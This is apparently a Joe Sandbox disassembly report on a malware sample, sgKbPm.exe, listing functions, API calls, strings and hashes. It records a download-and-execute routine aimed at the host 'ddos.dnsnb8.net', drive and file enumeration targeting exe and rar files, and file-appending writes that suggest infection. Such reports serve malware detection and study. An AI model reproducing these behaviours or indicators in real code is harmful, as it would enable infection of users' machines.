Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 78fd40d552075fed05bd2ff73ac51809fe2d280a0e2e7a20edf69990d90728c8
Instruction ID: 20fff416cdb7d5af190a9fae93f159df69d234ae8542ceae0c3ab1837ec45b28
Opcode Fuzzy Hash: 78fd40d552075fed05bd2ff73ac51809fe2d280a0e2e7a20edf69990d90728c8
Instruction Fuzzy Hash: 0A41A4B6404389AFD721DBA0DC48EDF77ECEB85346F040829F945D3051E630D68C97A6

Function 00C51099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C5185B: GetSystemTimeAsFileTime.KERNEL32(00C51F92,00000000,?,00000000,?,?,?,00C51F92,?,00000000,00000002), ref: 00C51867
Part of subcall function 00C5185B: srand.MSVCRT ref: 00C51878
Part of subcall function 00C5185B: rand.MSVCRT ref: 00C51880
Part of subcall function 00C5185B: srand.MSVCRT ref: 00C51890
Part of subcall function 00C5185B: rand.MSVCRT ref: 00C51894

WinExec.KERNEL32(?,00000005), ref: 00C510F1
lstrlen.KERNEL32(00C54748), ref: 00C510FA
wsprintfA.USER32 ref: 00C5112A
wsprintfA.USER32 ref: 00C51143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00C5115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00C51169
Sleep.KERNEL32 ref: 00C51179

Strings

%s%.8X.exe, xrefs: 00C51124
C:\Users\user\AppData\Local\Temp\, xrefs: 00C51119
ddos.dnsnb8.net, xrefs: 00C510C8, 00C510CF, 00C51140, 00C51168
http://%s:%d/%s/%s, xrefs: 00C510C2, 00C51141
cj/, xrefs: 00C51135

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-685328806
Opcode ID: 296b883d9663a7b8c660cfe3aa570a352db11cd2dc634b1aa85d587d79f3b854
Instruction ID: 3ae8e0aed726a0f55ee0078e58c855d38276cb8e1e1da1559c0af9de602c36ff
Opcode Fuzzy Hash: 296b883d9663a7b8c660cfe3aa570a352db11cd2dc634b1aa85d587d79f3b854
Instruction Fuzzy Hash: 16218D7D800348BADB249BA0DC49BAFBBBCAB0535BF150095E900A2051D7745BC8CF64

Function 00C51718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\sgKbPm.exe), ref: 00C51729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00C5174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00C5177C
__aulldiv.LIBCMT ref: 00C51796
__aulldiv.LIBCMT ref: 00C517A8

Strings

SOFTWARE\GTplus, xrefs: 00C51742, 00C5176B
Time, xrefs: 00C5173D, 00C51766
C:\Users\user\AppData\Local\Temp\sgKbPm.exe, xrefs: 00C51722

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\sgKbPm.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-761027960
Opcode ID: b01e0f8ff96348222253aa1e7eb5752c42f01b565f368eb0e07ab6fb4035c7ff
Instruction ID: dc1528bd45b4567ae0379a9270cd2d1b0b7e4f06cb8cb232e8cb905be9dd1a5f
Opcode Fuzzy Hash: b01e0f8ff96348222253aa1e7eb5752c42f01b565f368eb0e07ab6fb4035c7ff
Instruction Fuzzy Hash: AF119679A00209BBDB109AA4CC89FEF7BBCEB44B96F108025FD10B6141D6749B88C768

Function 00C56076 Relevance: 11.1, APIs: 7, Instructions: 618
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00C560BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00C560DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00C56189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00C561A5

Memory Dump Source

Source File: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b7d4e7f7687f156b457d9069aaa7b533ae9731471169aef8325426128c32863e
Instruction ID: 4ab05368d37abf44b93ec6bcb29423b22983e6833c2cc18d92bdabbd640394bd
Opcode Fuzzy Hash: b7d4e7f7687f156b457d9069aaa7b533ae9731471169aef8325426128c32863e
Instruction Fuzzy Hash: 2C1267B65087848FDB328F24CC45BEA7BB0EF02311F98059DDC958B1A3D774AA89C758

Function 00C52B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00C52BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00C52BB4
GetDriveTypeA.KERNEL32(?), ref: 00C52BD3
CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00C52BEE
lstrlen.KERNEL32(?), ref: 00C52BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00C52C16
CreateThread.KERNEL32(00000000,00000000,00C52845,00000000,00000000,00000000), ref: 00C52C3A

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: c924233cbb3744285a99097024915a8e775c3512ba8b92473d328870f69752cb
Instruction ID: fc09b50ad76331296e788ba10321b0e89a6bbffbc68d43c20fee533258efcde6
Opcode Fuzzy Hash: c924233cbb3744285a99097024915a8e775c3512ba8b92473d328870f69752cb
Instruction Fuzzy Hash: 5021DBB980039CAFE7209F649C84FAF7BBDFB4535AB140125FC52A2151D7609ECACB64

Function 00C51E6E Relevance: 30.4, APIs: 20, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,00C532B0,00000164,00C52986,?), ref: 00C51EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00C51ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00C51EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00C51F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00C51F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00C5201E
memset.MSVCRT ref: 00C520D8
memset.MSVCRT ref: 00C520EA
memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C5222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C52238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C5224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C522C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C522CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C522DD
WriteFile.KERNEL32(000000FF,00C54008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C522F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C5230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C52322
UnmapViewOfFile.KERNEL32(?,?,00C532B0,00000164,00C52986,?), ref: 00C52340
CloseHandle.KERNEL32(?,?,00C532B0,00000164,00C52986,?), ref: 00C5234E
CloseHandle.KERNEL32(000000FF,?,00C532B0,00000164,00C52986,?), ref: 00C52359

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
String ID:
API String ID: 3043204753-0
Opcode ID: 513e0b24cb2cdf8d7a8fae29f1bf28ce6bfd38975b6809937cb42c9adec871da
Instruction ID: 9ceabb72fc93a20b67bcd9a747e1c9fbc3308c5ae0b5407c04da906ecdff58fe
Opcode Fuzzy Hash: 513e0b24cb2cdf8d7a8fae29f1bf28ce6bfd38975b6809937cb42c9adec871da
Instruction Fuzzy Hash: 7DF15979900208EFCB24DFA4DC85AADBBB5FF09316F104529E919A72A1D730AEC5CF54

Function 00C51973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(00C54E5C,00000000,C:\Users\user\AppData\Local\Temp\sgKbPm.exe), ref: 00C51992
CreateFileA.KERNEL32(00C54E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00C519BA
Sleep.KERNEL32(00000064), ref: 00C519C6
wsprintfA.USER32 ref: 00C519EC
CopyFileA.KERNEL32(00C54E5C,?,00000000), ref: 00C51A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C51A1E
GetFileSize.KERNEL32(00C54E5C,00000000), ref: 00C51A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00C51A46
ReadFile.KERNEL32(00C54E5C,00C54E60,00000000,?,00000000), ref: 00C51A65
CloseHandle.KERNEL32(000000FF), ref: 00C51A90
DeleteFileA.KERNEL32(?), ref: 00C51AA7
VirtualFree.KERNEL32(00C54E60,00000000,00008000), ref: 00C51AC1

Strings

2, xrefs: 00C519CF
C:\Users\user\AppData\Local\Temp\, xrefs: 00C519DB
%s%.8X.data, xrefs: 00C519E6
C:\Users\user\AppData\Local\Temp\sgKbPm.exe, xrefs: 00C5197C

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\sgKbPm.exe
API String ID: 716042067-3008294092
Opcode ID: c6b0c69e3851f5d143d4235f9b3f3c7889131fcc3a1e85d7dc525a91d1b1a741
Instruction ID: 99075ebecf7f32ae2af2bbb7efbe60178522176585b9f1f484dc590a1777dada
Opcode Fuzzy Hash: c6b0c69e3851f5d143d4235f9b3f3c7889131fcc3a1e85d7dc525a91d1b1a741
Instruction Fuzzy Hash: 05515075901259AFCB129F94CC88BAEBBB8EB04356F144569FD25A6190C3309F84DB54

Function 00C528B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00C528D3
wsprintfA.USER32 ref: 00C528F7
memset.MSVCRT ref: 00C52925
wsprintfA.USER32 ref: 00C52940

Part of subcall function 00C529E2: memset.MSVCRT ref: 00C52A02
Part of subcall function 00C529E2: wsprintfA.USER32 ref: 00C52A1A
Part of subcall function 00C529E2: memset.MSVCRT ref: 00C52A44
Part of subcall function 00C529E2: lstrlen.KERNEL32(?), ref: 00C52A54
Part of subcall function 00C529E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00C52A6C
Part of subcall function 00C529E2: strrchr.MSVCRT ref: 00C52A7C
Part of subcall function 00C529E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00C52A9F
Part of subcall function 00C529E2: lstrlen.KERNEL32(Documents and Settings), ref: 00C52AAE
Part of subcall function 00C529E2: memset.MSVCRT ref: 00C52AC6
Part of subcall function 00C529E2: memset.MSVCRT ref: 00C52ADA
Part of subcall function 00C529E2: FindFirstFileA.KERNEL32(?,?), ref: 00C52AEF
Part of subcall function 00C529E2: memset.MSVCRT ref: 00C52B13

strrchr.MSVCRT ref: 00C52959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00C52974

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00C529B3
rar, xrefs: 00C52988
%s%s, xrefs: 00C528F1
exe, xrefs: 00C5296D
%s\, xrefs: 00C5293A

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-898104377
Opcode ID: f5721f4b279712247cc141bc3d6ad32ae0de58130eb49b010029ca74b06c7004
Instruction ID: b1e9fa9a3d00cc5f66552dd0fa26d52b14ecde2db4cb1ed16166544bbde66593
Opcode Fuzzy Hash: f5721f4b279712247cc141bc3d6ad32ae0de58130eb49b010029ca74b06c7004
Instruction Fuzzy Hash: E131D57D9003486BDB20A765DC89FCA77EC9B12353F040452FD45A2181E6B49BCC9B68

Function 00C51638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00C5164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00C5165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\sgKbPm.exe,00000104), ref: 00C5166E
CreateThread.KERNEL32(00000000,00000000,00C51099,00000000,00000000,00000000), ref: 00C516AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00C516BD

Part of subcall function 00C5139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\sgKbPm.exe), ref: 00C513BC
Part of subcall function 00C5139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00C513DA
Part of subcall function 00C5139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00C51448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\sgKbPm.exe), ref: 00C516E5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00C51644
C:\Windows\system32, xrefs: 00C51656
Documents and Settings, xrefs: 00C51696
C:\Users\user\AppData\Local\Temp\sgKbPm.exe, xrefs: 00C51662, 00C51667, 00C516DD

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\sgKbPm.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-1348673359
Opcode ID: 95b9c147d7e38e3e84a62871e7e64071342e87e3315d1f8c5eb7bb11d1873110
Instruction ID: 1330a20c7c7c7066cc4fe9347a64d1aa9190bf6512dafd0aaaa1603cb0a8ad1b
Opcode Fuzzy Hash: 95b9c147d7e38e3e84a62871e7e64071342e87e3315d1f8c5eb7bb11d1873110
Instruction Fuzzy Hash: CF11B47E5403547BCF2067A49D4DF9F3E6DEB853A7F040011FE09A10A0C67046C8DBA9

Function 00C51000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00C510E8,?), ref: 00C51018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A78400,?,http://%s:%d/%s/%s,00C510E8,?), ref: 00C51029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00C51038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00C510E8,?), ref: 00C5104B
UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00C510E8,?), ref: 00C51075
CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00C510E8,?), ref: 00C5108B
CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00C510E8,?), ref: 00C5108E

Strings

ddos.dnsnb8.net, xrefs: 00C51026
http://%s:%d/%s/%s, xrefs: 00C51000

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3273462101
Opcode ID: a2e634237846dce67d7795cec4213e054d2b9cda64f1e0198e337296795a0bf5
Instruction ID: ee74118932ae1f41f8a812560b4e92cd02c0b858ec79473a1825b6cf50666f5b
Opcode Fuzzy Hash: a2e634237846dce67d7795cec4213e054d2b9cda64f1e0198e337296795a0bf5
Instruction Fuzzy Hash: 0001617910039CBFE7306F609C88F2BBBACDB847EAF044529FA55A20D0D6705E848B74

Function 00C52C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00C52C57

Part of subcall function 00C51973: PathFileExistsA.SHLWAPI(00C54E5C,00000000,C:\Users\user\AppData\Local\Temp\sgKbPm.exe), ref: 00C51992
Part of subcall function 00C51973: CreateFileA.KERNEL32(00C54E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00C519BA
Part of subcall function 00C51973: Sleep.KERNEL32(00000064), ref: 00C519C6
Part of subcall function 00C51973: wsprintfA.USER32 ref: 00C519EC
Part of subcall function 00C51973: CopyFileA.KERNEL32(00C54E5C,?,00000000), ref: 00C51A00
Part of subcall function 00C51973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C51A1E
Part of subcall function 00C51973: GetFileSize.KERNEL32(00C54E5C,00000000), ref: 00C51A2C
Part of subcall function 00C51973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00C51A46
Part of subcall function 00C51973: ReadFile.KERNEL32(00C54E5C,00C54E60,00000000,?,00000000), ref: 00C51A65

CreateThread.KERNEL32(00000000,00000000,00C52B8C,00000000,00000000,00000000), ref: 00C52C99
WaitForMultipleObjects.KERNEL32(00000001,00C516BA,00000001,000000FF,?,00C516BA,00000000), ref: 00C52CAC
VirtualFree.KERNEL32(00C30000,00000000,00008000,C:\Users\user\AppData\Local\Temp\sgKbPm.exe,00C54E5C,00C54E60,?,00C516BA,00000000), ref: 00C52CC2

Strings

C:\Users\user\AppData\Local\Temp\sgKbPm.exe, xrefs: 00C52C69

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\sgKbPm.exe
API String ID: 2042498389-2559047063
Opcode ID: 8692cdef5c9ac906c7518f65b8238f3e48b6d343151e39735a18e19382c33885
Instruction ID: f3dbfb044acb1ddec1aba7b83f902f1fe7016fc8e6172c444737f7117844a30c
Opcode Fuzzy Hash: 8692cdef5c9ac906c7518f65b8238f3e48b6d343151e39735a18e19382c33885
Instruction Fuzzy Hash: CB01D4797013207BE7149794AC0AFDF7EACEF42B66F004020FD15E61C2D5A0AAC8C3A8

Function 00C514E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00C51504
VirtualQuery.KERNEL32(00C514E1,?,0000001C), ref: 00C51525
ExitProcess.KERNEL32 ref: 00C5157A

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 242020f22288ef175cbeec5adffa1db37793563cc6bf1376865ddec8436e4fe2
Instruction ID: 6756646c8b2dc7f8329ff8045a126a0c645890bf16364effa64b52e2cd2cd0fb
Opcode Fuzzy Hash: 242020f22288ef175cbeec5adffa1db37793563cc6bf1376865ddec8436e4fe2
Instruction Fuzzy Hash: 5E115E7D900304DFCB11DFA6E888B7D77B8EB84757B14402AFC12E6150E6708AC5AB54

Function 00C51915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00C51933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00C51947

Memory Dump Source

Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: c8f27013027668aa91356032184b054a38cdbe97a633e57d73f53fa526ac5ec6
Instruction ID: 4ffc9c4ba4cd60b44bf06b8e0dbae8614b6a8cc4dac486b0ea0304dde893c67f
Opcode Fuzzy Hash: c8f27013027668aa91356032184b054a38cdbe97a633e57d73f53fa526ac5ec6
Instruction Fuzzy Hash: ADF0493A100309ABD7209E66DC08BAB77ACAB50362F04853AFD25D1090E770D7C9DBA4

Function 00C56158 Relevance: 2.6, APIs: 2, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00C560DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00C56189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00C561A5

Memory Dump Source

Source File: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true

